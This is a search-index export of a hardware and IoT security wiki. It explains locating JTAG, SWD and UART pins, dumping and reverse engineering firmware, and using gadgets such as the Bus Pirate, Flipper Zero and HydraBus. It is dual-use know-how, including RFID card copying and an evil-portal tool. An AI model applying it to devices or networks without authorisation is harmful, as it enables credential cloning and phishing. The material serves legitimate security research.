{"config":{"lang":["en"],"separator":"[\\s\\-]+","pipeline":["stopWordFilter"]},"docs":[{"location":"","title":"\ud83d\udd0c Hardware All The Things","text":""},{"location":"#welcome-to-the-hardware-wiki","title":"Welcome to the Hardware wiki!","text":"

Welcome to our comprehensive Hardware Security Wiki, a curated collection of valuable payloads and bypass techniques tailored for Hardware and IoT Security. This repository serves as a dynamic and collaborative space, encouraging contributions from security enthusiasts and professionals alike.

Our goal is to foster a community-driven platform where individuals can share, learn, and enhance their skills in hardware and IoT security. Whether you are a seasoned security expert or just starting, this repository is designed to provide you with a wealth of knowledge and practical insights.

The information in this repository is very dense; you may encounter information overflow.

"},{"location":"#contribute-and-collaborate","title":"Contribute and Collaborate","text":"

We believe in the power of community and collective knowledge. Therefore, we warmly invite you to contribute your unique payloads, bypass techniques, and innovative strategies to enrich our repository. Your contributions help keep this project alive and kicking, ensuring that we can continue to bring you the latest and greatest in hardware and IoT security.

You can also share the project and contribute with a Github Sponsorship.

"},{"location":"debug-interfaces/jtag/","title":"JTAG","text":""},{"location":"debug-interfaces/jtag/#summary","title":"Summary","text":""},{"location":"debug-interfaces/jtag/#jtag-pins","title":"JTAG Pins","text":"

Allows testing, debugging, firmware manipulation and boundary scanning

TCK: Test Clock The drummer, or metronome that dictates the speed of the TAP controller. Voltage on this pin simply pulses up and down in a rhythmic, steady beat. On every \u201cbeat\u201d of the clock, the TAP controller takes a single action. The actual clock speed is not specified in the JTAG standard. The TAP controller accepts its speed from the outside device controlling JTAG.

TMS: Test Mode Select Voltages on the Mode Select pin control what action JTAG takes. By manipulating the voltage on this pin, you tell JTAG what you want it to do.

TDI: Test Data-In The pin that feeds data into the chip. The JTAG standard does not define protocols for communication over this pin. That is left up to the manufacturer. As far as JTAG is concerned, this pin is simply an ingress method for 1s and 0s to get into the chip. What the chip does with them is irrelevant to JTAG.

TDO: Test Data-Out The pin for data coming out of the chip. Like the Data-In pin, communication protocols are not defined by JTAG.

TRST: Test Reset (Optional) This optional signal is used to reset JTAG to a known good state; we'll explain why this is optional in a few paragraphs.

AVR has lock bits that protect the device against flash extraction.

# Read fuses and lock bits using avarice -r\n$ avarice --program --file test.elf --part atmega128 --jtag /dev/ttyUSB0 :4444\n# Acquire firmware using avrdude\n$ avrdude -p m128 -c jtagmkI -P /dev/ttyUSB0 -U flash:r:\"/home/avr/flash.bin\":r\n
"},{"location":"debug-interfaces/jtag/#enumeration-methods","title":"Enumeration methods","text":"

For enumeration methods see Enumeration/JTAG

"},{"location":"debug-interfaces/jtag/#references","title":"References","text":""},{"location":"debug-interfaces/swd/","title":"SWD","text":""},{"location":"debug-interfaces/swd/#summary","title":"Summary","text":""},{"location":"debug-interfaces/swd/#swd-pins","title":"SWD pins","text":"

JTAG and SWD are similar and can be interfaced with each other:

JTAG Mode | SWD Mode | Signal\nTCK | SWCLK | Clock into the core\nTDI | - | JTAG test data input\nTDO | SWV | JTAG test data output / SWV trace data output\nTMS | SWDIO | JTAG test mode select / SWD data in and out\nGND | GND | -"},{"location":"debug-interfaces/swd/#references","title":"References","text":""},{"location":"debug-interfaces/uart/","title":"UART","text":""},{"location":"debug-interfaces/uart/#what-is-it","title":"What is it?","text":"

UART stands for Universal Asynchronous Receiver/Transmitter. It is used for serial communication over the serial port of a computer or peripheral device.

UART peripherals are commonly integrated into many embedded devices. UART communication relies on an agreed baud rate to keep the two devices synchronized. The baud rate is the rate at which information is transferred over a communication channel.

With access to the UART, a user can see the bootloader and operating system logs.

Generally, the line is held high (at a logical 1 value) while UART is in idle state.

We call the most common configuration 8N1: eight data bits, no parity, and 1 stop bit.

"},{"location":"debug-interfaces/uart/#identifying-uart-ports","title":"Identifying UART ports","text":"

A UART pinout has four ports:

To find UART there are multiple solutions:

Keep in mind that some devices emulate UART ports by programming the General-Purpose Input/Output (GPIO) pins if there isn't enough space on the board for dedicated hardware UART pins.

It is advised to sample the communication at 4 times the baud rate to avoid decoding issues.

"},{"location":"debug-interfaces/uart/#using-a-multimeter","title":"Using a multimeter","text":""},{"location":"debug-interfaces/uart/#gnr-pin","title":"GNR pin","text":"

First, identify the GND pin by using the multimeter in continuity mode.

Place the black probe on any grounded metallic surface, be it a part of the tested PCB or not. Then place the red probe on each of the ports. When you hear a beeping sound, you found a GND pin.

"},{"location":"debug-interfaces/uart/#vcc-pin","title":"VCC pin","text":"

Turn the multimeter to DC voltage mode and set it to the 20V range. Keep the black probe on a grounded surface. Place the red probe on a suspected pin and turn on the device.

If the multimeter measures a constant voltage of either 3.3V or 5V, you've found the VCC pin.

"},{"location":"debug-interfaces/uart/#tx-pin","title":"TX pin","text":"

Keep the multimeter mode at DC voltage of 20V or less, and leave the black probe on a grounded surface. Move the red probe to the suspected pin and power cycle the device. If the voltage fluctuates for a few seconds and then stabilizes at the VCC value, you've most likely found the TX pin.

This behavior happens because, during bootup, the device sends serial data through that TX pin for debugging purposes. Once it finishes booting, the UART line goes idle.

"},{"location":"debug-interfaces/uart/#rx-pin","title":"Rx pin","text":"

If you've already identified the rest of the UART pins, the nearby fourth pin is most likely the RX pin.

Otherwise, you can identify it because it has the lowest voltage fluctuation and lowest overall value of all the UART pins.

"},{"location":"debug-interfaces/uart/#using-a-logic-analyzer","title":"Using a logic analyzer","text":"

A logic analyzer is an electronic instrument that captures and displays multiple signals from a digital system or digital circuit.

To find the UART pins we will connect the pins to a logic analyzer and look for data being transmitted.

"},{"location":"debug-interfaces/uart/#hardware-setup","title":"Hardware setup","text":"

Make sure any system you're testing is powered off when you connect the logic analyzer's probes to it to avoid short-circuiting.

"},{"location":"debug-interfaces/uart/#software-setup","title":"Software setup","text":""},{"location":"debug-interfaces/uart/#pulseview-sigrok","title":"PulseView / Sigrok","text":"

In order to make PulseView work on a Windows host, you have to install the Zadig driver: https://zadig.akeo.ie/

Once you have an interesting capture, you can save it and decode it with sigrok-cli instead of the PulseView GUI:

sigrok-cli -O ascii -i ./uart.sr -P uart:baudrate=115200:rx=D0 -B uart=rx\n

"},{"location":"debug-interfaces/uart/#saleae-based-logic-analyzer","title":"Saleae-based logic analyzer","text":"

This setup is for Saleae-based logic analyzers; if you use a different one, refer to the manufacturer's documentation.

If you want to modify the speed and the duration:

Now try the popular baud rates on both suspected pins and compare the results. If you get readable text on one of the pins and the text makes sense, that\u2019s the TX pin.

"},{"location":"debug-interfaces/uart/#connect-to-serial-port","title":"Connect to serial port","text":""},{"location":"debug-interfaces/uart/#warning","title":"WARNING","text":"

It's not a big deal if you confuse the UART RX and TX ports with each other, because you can easily swap the wires connecting to them without any consequences. But confusing the VCC with the GND and connecting wires to them incorrectly might fry the circuit.

"},{"location":"debug-interfaces/uart/#examples","title":"Examples","text":""},{"location":"debug-interfaces/uart/#connection-using-a-usb-to-ttl","title":"Connection using a USB to TTL","text":"

Once the ports are connected, plug the adapter into your computer. You now need to find the device file assigned to the adapter. To do that, run the following command: sudo dmesg.

Typically, it will be assigned to /dev/ttyUSB0 if you don't have any other peripheral devices attached.

Under Ubuntu or Debian, a non-root user cannot access serial ports such as ttyS0 or ttyUSB0 unless they are a member of the dialout group! The equivalent group on Arch-based distributions is uucp. In other words, you just have to add yourself to this group to get access.

"},{"location":"debug-interfaces/uart/#detect-the-baud-rate","title":"Detect the baud rate","text":""},{"location":"debug-interfaces/uart/#most-common-baud-rate","title":"Most common baud rate","text":"

The most common baud rates for UART are 9600, 19200, 38400, 57600 and 115200.

A table of other, less commonly used baud rates can be found here.

"},{"location":"debug-interfaces/uart/#autodetect-the-baud-rate-using-a-script","title":"Autodetect the baud rate using a script","text":"
# Download the script\nwget https://raw.githubusercontent.com/devttys0/baudrate/master/baudrate.py\n\n# Install the pyserial dependency (it provides the \"serial\" module the script imports)\npip2.7 install pyserial\n\n# Run the script on \"/dev/ttyUSB0\"\npython2.7 baudrate.py -p /dev/ttyUSB0\n
"},{"location":"debug-interfaces/uart/#using-pulseview","title":"Using PulseView","text":"

It is possible to derive the baud rate from the duration of one bit period, using PulseView or any other bus analysis tool:

# Baud rate = 1 / bit period (here a bit period of 8.003 us measured in PulseView)\n# https://www.cuemath.com/frequency-formula/\n>>> 1/8.003e-6\n124953.14257153569\n

The closest common baud rate is 115200. Configure the decoder with it and you should see ASCII characters:

"},{"location":"debug-interfaces/uart/#interact-with-uart","title":"Interact with UART","text":""},{"location":"debug-interfaces/uart/#uart-over-ble","title":"UART over BLE","text":"

It\u2019s an emulation of serial port over BLE. The UUID of the Nordic UART Service is 6E400001-B5A3-F393-E0A9-E50E24DCCA9E. This service exposes two characteristics: one for transmitting and one for receiving.

"},{"location":"debug-interfaces/uart/#references","title":"References","text":""},{"location":"enumeration/chip-identification/","title":"Chip identification","text":""},{"location":"enumeration/chip-identification/#emrf-shield","title":"EM/RF shield","text":"

The Electromagnetic/Radio Frequency shield should be removed to see what it is hiding.

"},{"location":"enumeration/fcc-id/","title":"FCC ID","text":""},{"location":"enumeration/fcc-id/#searchable-fcc-id-database","title":"Searchable FCC ID Database","text":"

An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission.

For legal sale of wireless devices in the US, manufacturers must:

"},{"location":"enumeration/jtag/","title":"JTAG","text":"

Sometimes, when you have no idea what the pinout of the JTAG port is, you have to find a way to correctly identify each of the JTAG pins. There are a few ways to do that; one of them is \"bruteforcing\" the pins with the IDCODE or BYPASS JTAG commands.

There are several tools and ways to enumerate JTAG pins. Here are a few:

"},{"location":"enumeration/jtag/#searching-jtag-pins-with-raspberry-pi-pico","title":"Searching JTAG pins with Raspberry PI Pico","text":""},{"location":"enumeration/jtag/#how-does-it-work","title":"How does it work?","text":"

JTAGscan iterates over all defined pins (currently for RP2040, the first 16 pins) searching for TMS, TCK, TDO and TDI.

It has two approaches:

"},{"location":"enumeration/jtag/#hardware-suggestions","title":"Hardware suggestions","text":"

Any Raspberry Pi Pico board should work fine for scanning JTAG ports. Check the VCC of the target to confirm it is 3.3V; any other voltage level requires a level shifter to avoid damage.

It is also recommended to put a 33 Ohm series resistor on every tested pin, to avoid a short circuit if a pin you are driving turns out to be an output.

"},{"location":"enumeration/jtag/#programming-the-pipico","title":"Programming the PiPico","text":"
  1. Go to Releases and download the jtagscan-xxxx.zip
  2. Extract the zip file for the uf2 file
  3. Plug your raspberry pi pico in the USB port while pressing the BOOT button (to enable bootloader)
  4. A new \"disk\" should appear in your machine. Drag the uf2 file to the disk
  5. The raspberry pi pico should reboot and be recognized as a usb-serial converter
"},{"location":"enumeration/jtag/#using","title":"Using","text":"

Open the detected serial port in your favorite serial terminal application (for example, PuTTY)

Hit the key h to show the help.

+-------------------------------+\n|  JTAGscan Jtag Pinout Finder  |\n+-------------------------------+\n a - Automatically find all pins\n i - IDCODE search for pins\n b - BYPASS search for pins\n t - TDI-only BYPASS search\n m - set pin mask, current: 0xFFFF\n d - set debug level: 1\n c - half cycle us, current: 32\n h - print this help\n+-------------------------------+\n

Hit a to scan the JTAG pins. This first runs an IDCODE scan and then a BYPASS scan. Depending on how many pins are enabled in the pin mask (you can change it with m), it can take a while. On success, the scanner stops with a message like this one:

     Automatically searching\n+-- Starting with IDCODE scan --+\n| TCK | TMS | TDO |      IDCODE |\n+-------------------------------+\n|   2 |   3 |   0 |    cba00477 |\n+----------- SUCCESS -----------+\n    TCK, TMS, and TDO found.\n\n+-- BYPASS searching, just TDI -+\n| TCK | TMS | TDO | TDI | Width |\n+-------------------------------+\n|   2 |   3 |   0 |   1 |    31 |\n+----------- SUCCESS -----------+\n
"},{"location":"enumeration/jtag/#jtagenum-with-arduino-or-raspberry-pi","title":"JTAGEnum with Arduino or Raspberry Pi","text":"

JTAGenum is an open source JTAG scanner for Arduino (JTAGenum.ino) or Raspberry Pi (JTAGenum.sh, experimental). This code was built with three primary goals:

\u26a0\ufe0f JTAG and device must share the same ground.

Software connection setup:

Arduino PIN Layout

"},{"location":"enumeration/jtag/#references","title":"References","text":""},{"location":"firmware/firmware-dumping/","title":"Firmware Dumping","text":""},{"location":"firmware/firmware-dumping/#flash-memory-types","title":"Flash Memory Types","text":""},{"location":"firmware/firmware-dumping/#flash-a-new-firmware-into-the-microcontroller","title":"Flash a new firmware into the microcontroller","text":""},{"location":"firmware/firmware-dumping/#dump-flash-using-debug-port","title":"Dump flash using debug port","text":""},{"location":"firmware/firmware-dumping/#dump-flash-via-spi","title":"Dump Flash via SPI","text":""},{"location":"firmware/firmware-dumping/#convert-ihex-to-elf","title":"Convert ihex to elf","text":"

The Intel HEX is a transitional file format for microcontrollers, (E)PROMs, and other devices. The documentation states that HEXs can be converted to binary files and programmed into a configuration device.

Each line (record) in the ihex file starts with a colon (:).

Convert a .hex (ihex format) file to .elf with avr-objcopy, or with the online tool at http://matrixstorm.com

$ avr-objcopy -I ihex -O elf32-avr dump.hex dump.elf\n# or \n$ objcopy -I ihex chest.hex -O binary chest.bin ; xxd chest.bin\n

Alternatively, with the Python bincopy module:

import bincopy\nimport sys\n\nf = bincopy.BinFile()\nf.add_ihex_file(sys.argv[1])\nprint(f.as_binary())\n

Quickly run strings on a .hex file:

cat defaultPassword.ino.arduino_standard.hex | tr -d \":\" | tr -d \"\\n\" | xxd -r -p  | strings \n

Inspect the assembly with avr-objdump -m avr -D chest.hex. Emulate it with: qemu-system-avr -S -s -nographic -serial tcp::5678,server=on,wait=off -machine uno -bios chest.bin

"},{"location":"firmware/firmware-dumping/#explore-filesystem","title":"Explore Filesystem","text":""},{"location":"firmware/firmware-dumping/#common-filesystem","title":"Common Filesystem","text":" Filesystem RO/RW Magic Tool SquashFS RO sqsh, hsqs, qshs, sqsl unsquashfs, 7zip JFFS(2) RW 0x07C0 (v1), 0x72b6(v2) jefferson YAFFS(2) RW 0x5941ff53 unyaffs CramFS RO 0x28cd3d45 uncramfs, 7zip UBIFS RW 0x06101831 ubi_reader RomFS RO 0x7275 / CPIO RO \"070707\" cpio, 7zip"},{"location":"firmware/firmware-dumping/#tools","title":"Tools","text":""},{"location":"firmware/firmware-dumping/#write-new-firmware","title":"Write new firmware","text":""},{"location":"firmware/firmware-dumping/#type-of-firmware","title":"Type of firmware","text":""},{"location":"firmware/firmware-dumping/#check-entropy","title":"Check entropy","text":"

High entropy = probably encrypted (or compressed). Low entropy = probably neither.

$ binwalk -E fw\n
"},{"location":"firmware/firmware-dumping/#encrypted-firmware","title":"Encrypted firmware","text":""},{"location":"firmware/firmware-dumping/#over-the-air-updates","title":"Over-the-air updates","text":"

TODO

"},{"location":"firmware/firmware-dumping/#references","title":"References","text":""},{"location":"firmware/firmware-reverse-engineering/","title":"Firmware Reverse Engineering","text":""},{"location":"firmware/firmware-reverse-engineering/#loading-bare-metal-binaries-into-ida","title":"Loading bare-metal binaries into IDA","text":"

Requirements:

\u26a0\ufe0f For ARM Arduino firmware the entry point is located at the _RESET interrupt vector.

To load it properly in IDA, open the file, select ATMEL AVR and then select ATmega323_L.

"},{"location":"firmware/firmware-reverse-engineering/#loading-bare-metal-binaries-into-radare2","title":"Loading bare-metal binaries into Radare2","text":"

Radare2 can natively disassemble AVR (Arduino) code:

$ radare2 -A -a arm -b 32 ihex://Challenge_v3.hex\n[x] Analyze all flags starting with sym. and entry0 (aa)\n[x] Analyze function calls (aac)\n[x] find and analyze function preludes (aap)\n[x] Analyze len bytes of instructions for references (aar)\n[x] Check for objc references\n[x] Check for vtables\n[x] Finding xrefs in noncode section with anal.in=io.maps\n[x] Analyze value pointers (aav)\n[x] Value from 0x00000000 to 0x10001018 (aav)\n[x] 0x00000000-0x10001018 in 0x0-0x10001018 (aav)\n[x] Emulate code to find computed references (aae)\n[x] Type matching analysis for all functions (aaft)\n[x] Propagate noreturn information\n[x] Use -AA or aaaa to perform additional experimental analysis.\n\n[0x565e8640]> aaaa\n[0xf7723a20]> afl\n[0xf7723a20]> e asm.describe = true\n[0xf7723a20]> s main\n[0x0804873b]> pdf\n\nTo perform a case-insensitive search for strings use /i:\n[0x0001d62c]> /i Exploding\nSearching 9 bytes in [0x0-0x10001018]\nhits: 1\n0x0003819e hit1_0 .. N# NExploding Firmware ! N.\n\n$ r2 -a avr /tmp/flash\n[0x000000c4]> afr\n[0x000000c4]> pd 17\n\n$ rasm2 -a avr -d \"0c94 751b 0c94 9d1b 0c94 d72c\" \njmp 0x36ea\njmp 0x373a\njmp 0x59ae\n
"},{"location":"firmware/firmware-reverse-engineering/#loading-bare-metal-binaries-into-ghidra","title":"Loading bare-metal binaries into Ghidra","text":"

SVD-Loader for Ghidra automates the entire generation of peripheral structs and memory maps for over 650 different microcontrollers

Usage

"},{"location":"firmware/firmware-reverse-engineering/#esptool","title":"ESPTool","text":"

ESP8266 and ESP32 serial bootloader utility : espressif/esptool

josh@ioteeth:/tmp/reversing$ ~/esptool/esptool.py image_info recovered_file\nesptool.py v2.4.0-dev\nImage version: 1\nEntry point: 4010f29c\n1 segments\nSegment 1: len 0x00568 load 0x4010f000 file_offs 0x00000008\n
"},{"location":"firmware/firmware-reverse-engineering/#nrf5x-firmware-disassembly-tools","title":"nRF5x Firmware disassembly tools","text":"
$ python3 nrfident.py bin firmwares/s132.bin\nBinary file provided firmwares/s132.bin\nComputing signature from binary\nSignature:  d082a85351ee18ecfdc9dcb01352f5df3d938a2270bcadec2ec083e9ceeb3b1e\n=========================\nSDK version:  14.0.0\nSoftDevice version: s132\nNRF: nrf52832\n=========================\nSDK version:  14.1.0\nSoftDevice version: s132\nNRF: nrf52832\nSoftDevice  :  s132\nCard version :  xxaa\n           *****\nRAM address  :  0x20001368\nRAM length   :  0xec98\nROM address  :  0x23000\nROM length   :  0x5d000\n
"},{"location":"firmware/firmware-reverse-engineering/#pure-disassemblers","title":"Pure disassemblers","text":""},{"location":"firmware/firmware-reverse-engineering/#simulating-avr","title":"Simulating AVR","text":"

Programs compiled for Arduino can be simulated using AVR Studio or the newer Atmel Studio. I have used the former along with hapsim. Hapsim works by hooking into AVR Studio and can simulate peripherals like the UART, LCD etc.

$ simulavr -P atmega128 -F 16000000 -f build-crumbuino128/ex1.1.elf\n
"},{"location":"firmware/firmware-reverse-engineering/#uefi-firmware","title":"UEFI Firmware","text":"

Parse BIOS/Intel ME/UEFI firmware related structures: Volumes, FileSystems, Files, etc - theopolis/uefi-firmware-parser

sudo pip install uefi_firmware\n$ uefi-firmware-parser --test ~/firmware/*\n~/firmware/970E32_1.40: UEFIFirmwareVolume\n~/firmware/CO5975P.BIO: EFICapsule\n~/firmware/me-03.obj: IntelME\n~/firmware/O990-A03.exe: None\n~/firmware/O990-A03.exe.hdr: DellPFS\n
"},{"location":"firmware/firmware-reverse-engineering/#references","title":"References","text":""},{"location":"gadgets/arduino/","title":"Arduino","text":""},{"location":"gadgets/arduino/#_1","title":"Arduino","text":""},{"location":"gadgets/arduino/#references","title":"References","text":""},{"location":"gadgets/bruschetta-board/","title":"Bruschetta","text":""},{"location":"gadgets/bruschetta-board/#documentation","title":"Documentation","text":"

Bruschetta is the latest board for interacting with hardware; it is an upgraded version of these projects.

"},{"location":"gadgets/bruschetta-board/#usage","title":"Usage","text":""},{"location":"gadgets/bruschetta-board/#references","title":"References","text":""},{"location":"gadgets/bus-pirate/","title":"Bus Pirate","text":""},{"location":"gadgets/bus-pirate/#firmwares","title":"Firmwares","text":""},{"location":"gadgets/bus-pirate/#examples","title":"Examples","text":"

Dump firmware over SPI using a Bus Pirate

# Identify the EEPROM/flash chip (flashrom probes it when no operation is given)\nsudo flashrom -p buspirate_spi:dev=/dev/ttyUSB0\n\n# Dump firmware using a Bus Pirate (SPI); programmer names are lower-case\nsudo flashrom -p buspirate_spi:dev=/dev/ttyUSB0,spispeed=1M -c <chip name> -r <dump.bin>\n
"},{"location":"gadgets/bus-pirate/#references","title":"References","text":""},{"location":"gadgets/ch341a/","title":"CH341A","text":""},{"location":"gadgets/ch341a/#dump-spi-flash","title":"Dump SPI flash","text":""},{"location":"gadgets/ch341a/#ch341eeprom","title":"ch341eeprom","text":"

https://github.com/plumbum/ch341eeprom

sudo apt install git make libusb-1.0-0-dev clang\ngit clone https://github.com/plumbum/ch341eeprom.git\nmake\n./ch341eeprom -v -s 24c05 -r dump.bin\n
"},{"location":"gadgets/ch341a/#flashrom","title":"Flashrom","text":"
sudo flashrom -V --programmer ch341a_spi -r dump.bin\nsudo flashrom -V --programmer ch341a_spi -r dump.bin -c W25Q16.V # Specify the chip\n
"},{"location":"gadgets/esp32/","title":"ESP32","text":"

ESP32 and ESP8266 share almost the same architecture.

"},{"location":"gadgets/esp32/#tools","title":"Tools","text":""},{"location":"gadgets/esp32/#firmwares","title":"Firmwares","text":""},{"location":"gadgets/esp32/#flashing","title":"Flashing","text":"

The ESP32 microprocessor uses the Xtensa instruction set; select Tensilica Xtensa 32-bit little-endian as the language in Ghidra.

"},{"location":"gadgets/esp32/#references","title":"References","text":""},{"location":"gadgets/flipper-zero/","title":"Flipper Zero","text":""},{"location":"gadgets/flipper-zero/#firmwares","title":"Firmwares","text":""},{"location":"gadgets/flipper-zero/#firmware-update-pc","title":"Firmware Update - PC","text":"
  1. Update to the latest firmware using https://flipperzero.one/update
  2. Download and install qFlipper
  3. Connect your Flipper Zero via USB, update to the official firmware
  4. Disconnect from USB, power off the Flipper Zero, and remove the SD to prepare it for flashing.
  5. Download the latest RogueMaster firmware from their Github Page.
  6. Unzip the downloaded .zip and copy the content into /update of the Flipper SD card (including the .dfu)
  7. On the Flipper Zero, once booted, press down, and left until you are on the 'Browser' screen. Scroll down until you see the 'update' directory and click on it.
  8. You should now see the contents you uploaded and an 'update' option. Hover over the 'update' option, click the center button on your Flipper, once again on the 'Run in App' option.
"},{"location":"gadgets/flipper-zero/#firmware-update-webupdater","title":"Firmware Update - WebUpdater","text":""},{"location":"gadgets/flipper-zero/#gpio","title":"GPIO","text":""},{"location":"gadgets/flipper-zero/#videos","title":"Videos","text":""},{"location":"gadgets/flipper-zero/#tutorials-and-resources","title":"Tutorials and Resources","text":""},{"location":"gadgets/flipper-zero/#ioc","title":"IOC","text":"

IEEE-assigned MAC address prefix for Flipper Zero: 0C:FA:22:XX:XX:XX. This applies to the Bluetooth, Ethernet and WiFi interfaces.

0C-FA-22   (hex)     FLIPPER DEVICES INC\n0CFA22     (base 16) FLIPPER DEVICES INC\n                     2803 Philadelphia Pike Suite B #551\n                     Claymont    19703\n                     US\n
"},{"location":"gadgets/flipper-zero/#references","title":"References","text":""},{"location":"gadgets/goodfet/","title":"GoodFET","text":""},{"location":"gadgets/goodfet/#facedancer","title":"Facedancer","text":"

The Facedancer21 is the twenty-fourth hardware revision of the GoodFET, owing its heritage to the GoodFET41 and Facedancer20. Unlike the general-purpose GoodFET boards, the only purpose of this board is to allow USB devices to be written in host-side Python, so that one workstation can fuzz-test the USB device drivers of another host.

"},{"location":"gadgets/goodfet/#references","title":"References","text":""},{"location":"gadgets/hydrabus/","title":"HydraBus","text":""},{"location":"gadgets/hydrabus/#features","title":"Features","text":"

Supports many extensions:

External interactions:

"},{"location":"gadgets/hydrabus/#firmware","title":"Firmware","text":""},{"location":"gadgets/hydrabus/#firmware-update","title":"Firmware Update","text":"

Detailed steps: hydrafw/Getting-Started-with-HydraBus-flash-and-use-hydrafw-on-linux

  1. Install dfu-util

    git clone git://git.code.sf.net/p/dfu-util/dfu-util dfu-util\ncd dfu-util\n./autogen.sh\n./configure\nsudo make install\n

  2. Download the latest release of the firmware

    wget https://github.com/hydrabus/hydrafw/releases/download/v0.11/build_HydraFW_v0.11-12-ga6019f4_HydraBus_HydraNFC.zip\nwget https://raw.githubusercontent.com/hydrabus/hydrafw/master/utils/udev-rules/09-hydrabus.rules -O ~/hydrafw/09-hydrabus.rules\n

  3. Keep the UBTN button pressed at power-on/reset in order to enter USB DFU mode

  4. Connect the MicroUSB cable from your PC to HydraBus
  5. Check Linux detection for HydraBus in DFU mode: sudo dfu-util -l
  6. Flash the firmware: sudo dfu-util -i 0 -a 0 -d 0483:df11 -D ./build/hydrafw.dfu
"},{"location":"gadgets/hydrabus/#commands","title":"Commands","text":""},{"location":"gadgets/hydrabus/#syntax","title":"Syntax","text":"Value Description [ Chip select (CS) active (low) ] CS disable (high) r Read one byte by sending dummy byte (0xff). r:1...255 for bulk reads hd Read one byte by sending dummy byte (0xff). hd:1...4294967295 for bulk reads. Displays a hexdump of the result w Followed by values to write byte(s). w:1...255 for bulk writes 0b Write this binary value. Format is 0b00000000 for a byte, but partial bytes are also fine: 0b1001 0 Write this Octal value. Format is prefixed by a 0 (values from 000 to 077) \" Write an ASCII-encoded string 0h/0x Write this HEX value. Format is 0h01 or 0x01. Partial bytes are fine: 0xA. A-F can be lower-case or capital letters 0-255 Write this decimal value. Any number not preceded by 0x, 0h, or 0b is interpreted as a decimal value

Examples:

"},{"location":"gadgets/hydrabus/#references","title":"References","text":""},{"location":"gadgets/hydraflash/","title":"HydraFlash","text":"

Designed to dump NAND flash chips.

"},{"location":"gadgets/hydraflash/#usage","title":"Usage","text":""},{"location":"gadgets/hydraflash/#references","title":"References","text":""},{"location":"gadgets/hydranfc/","title":"HydraNFC","text":""},{"location":"gadgets/hydranfc/#features","title":"Features","text":""},{"location":"gadgets/hydranfc/#firmware","title":"Firmware","text":"

From the console, type nfc and press Enter to enter the NFC mode dedicated to the HydraNFC Shield v2.

> nfc\nNFCv2> nfc-all\nNFCv2> show\nNFCv2> nfc-all scan\n
"},{"location":"gadgets/hydranfc/#references","title":"References","text":""},{"location":"gadgets/hydrausb3/","title":"HydraUSB3","text":"

HydraUSB3 (WCH CH569) open source test firmware / examples / libraries to experiment with streaming / high-speed protocols (USB2 HS, USB3 SS, HSPI, SerDes...)

Warning It is MANDATORY to buy a \u201cUSB 3 Type A male to USB 3 Type A male cable\u201d (the cable shall have Power+Data with USB2 and USB3 SS signals)

"},{"location":"gadgets/hydrausb3/#firmware-flashing","title":"Firmware Flashing","text":"

Linux

Windows (requires MSYS2/MINGW64)

"},{"location":"gadgets/hydrausb3/#references","title":"References","text":""},{"location":"gadgets/icopy-x/","title":"iCopy-X","text":"

iCopy-X is a \"super\" automated handheld RFID copier based on Proxmark3. iCopy-X can read, crack, duplicate, sniff and simulate without the use of a PC.

"},{"location":"gadgets/icopy-x/#update","title":"Update","text":"

Latest firmware: 1.0.90 2022-08-16

Step 1: Enter the device S/N (found under the \u201cAbout\u201d menu) on the website and download the upgrade package to your PC.

Step 2: Connect the iCopy-X to your computer using the supplied USB TYPE C cable and delete any files that end in \u201c.ipk\u201d from the root directory.

Step 3: Copy the newly downloaded upgrade package to the root directory.

Step 4: Press \"Ok\" on the second page of the \"About\" menu on the iCopy-X to start the automatic upgrade.

TIP: Ensure that the serial number has been entered correctly before starting, as an incorrect serial number will cause the upgrade to fail.

"},{"location":"gadgets/icopy-x/#pc-mode","title":"PC Mode","text":"

In PC mode, after connecting the device to the computer, open the client from the built-in USB disk; you can then use the standard Proxmark3 commands directly.

COM Port (Check Device Manager, numbers only):  4\n[=] Session log E:/CLIENT_X86/.proxmark3/logs/log_20240730.txt\n[+] loaded from JSON file E:/CLIENT_X86/.proxmark3/preferences.json\n[=] Using UART port /com4\n[=] Communicating with PM3 over USB-CDC\n[usb] pm3 -->\n
"},{"location":"gadgets/icopy-x/#references","title":"References","text":""},{"location":"gadgets/logic-analyzer/","title":"Logic Analyzer","text":""},{"location":"gadgets/logic-analyzer/#sigrok-pulseview","title":"Sigrok / Pulseview","text":""},{"location":"gadgets/logic-analyzer/#saleae","title":"Saleae","text":""},{"location":"gadgets/logic-analyzer/#interact","title":"Interact","text":"
screen /dev/ttyUSB0 19200\n
"},{"location":"gadgets/logic-analyzer/#references","title":"References","text":""},{"location":"gadgets/m5stack/","title":"Evil M5Core2","text":"

Evil-M5Core2 is an easy evil-portal and rogue-app deployment software designed to work on the M5Stack Core2.

"},{"location":"gadgets/m5stack/#features","title":"Features","text":""},{"location":"gadgets/m5stack/#firmwares","title":"Firmwares","text":"

Requirements:

Install:

"},{"location":"gadgets/m5stack/#references","title":"References","text":""},{"location":"gadgets/memory-programmer/","title":"Memory Programmer","text":"

RT809H with multiple adapters/sockets for eMMC/NAND Flash

"},{"location":"gadgets/micro-bit/","title":"Micro::bit","text":""},{"location":"gadgets/micro-bit/#extract-source-code-from-firmware","title":"Extract source code from firmware","text":"

When the source has been built from https://makecode.microbit.org/#editor, the JavaScript code is embedded into the firmware.

import bincopy\nimport lzma\nimport sys\nimport subprocess\nimport json\n\n# split firmware into raw and code\nwith open(sys.argv[1],'r') as f:\n    fwstring = f.read()\n    fwsplit = fwstring.split('\\n\\n')\n\n    with open('fw_raw.hex', 'w') as g:\n        g.write(fwsplit[0])\n    with open('fw_code.hex', 'w') as g:\n        g.write(fwsplit[1])\n\n# Convert ihex to bin\nf = bincopy.BinFile()\nf.add_ihex_file('fw_code.hex')\nbinary = f.as_binary()\nprint(\"[+] ihex converted to binary\")\n\n## Extract code firmware, bruteforce offset\nfor i in range(200):\n    with open('firmware.bin', 'w+b') as g:\n        g.write(binary[i:])\n\n    try:\n        data = subprocess.run([\"lzma\", \"firmware.bin\", \"-d\", \"--stdout\"], capture_output=True)\n        data = data.stdout.decode().split('}',1)\n        data = data[1][1:]\n        data = json.loads(data)\n        print(data)\n        print(\"\\n[+] Javascript code\")\n        print(data['main.ts'])\n    except Exception as e:\n        continue\n
"},{"location":"gadgets/micro-bit/#extract-firmware-using-swd","title":"Extract firmware using SWD","text":""},{"location":"gadgets/micro-bit/#connection","title":"Connection","text":"

Solder wires on SWD pins:

Connect to an ST-LINK v2:

"},{"location":"gadgets/micro-bit/#openocd-profile","title":"OpenOCD profile","text":"

Official datasheet of the nRF51822:

https://infocenter.nordicsemi.com/pdf/nRF51822_PS_v3.1.pdf

Code section size:

hex(1024*256) = 0x40000 => 0x00040000

